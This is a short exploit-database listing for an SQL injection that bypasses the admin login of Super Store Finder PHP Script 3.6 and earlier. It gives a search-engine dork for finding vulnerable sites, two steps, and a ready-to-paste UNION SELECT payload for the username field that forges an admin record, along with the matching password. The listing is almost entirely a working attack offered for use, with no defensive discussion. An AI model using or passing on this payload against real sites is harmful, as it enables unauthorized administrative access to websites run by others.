[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Super Store Finder PHP Script 3.6 SQL Injection Vulnerability

Author
Etharus
Risk
[
Security Risk High
]
0day-ID
0day-ID-38848
Category
web applications
Date add
05-07-2023
Platform
php
#Title : Super Store Finder PHP Script SQL Injection / Bypass admin login
#Researcher : Etharus
#Vendor : Joe Iz, https://superstorefinder.net/
#Script Demo Url : https://superstorefinder.net/products/superstorefinder/
#Version Affected : 3.6 and below
#Date : 5 July 2023
#FOFA Dork : "designed and built by Joe Iz."
# Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/
# Step 2 : Enter following payload

username : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -
password : admin

#  0day.today [2024-12-27]  #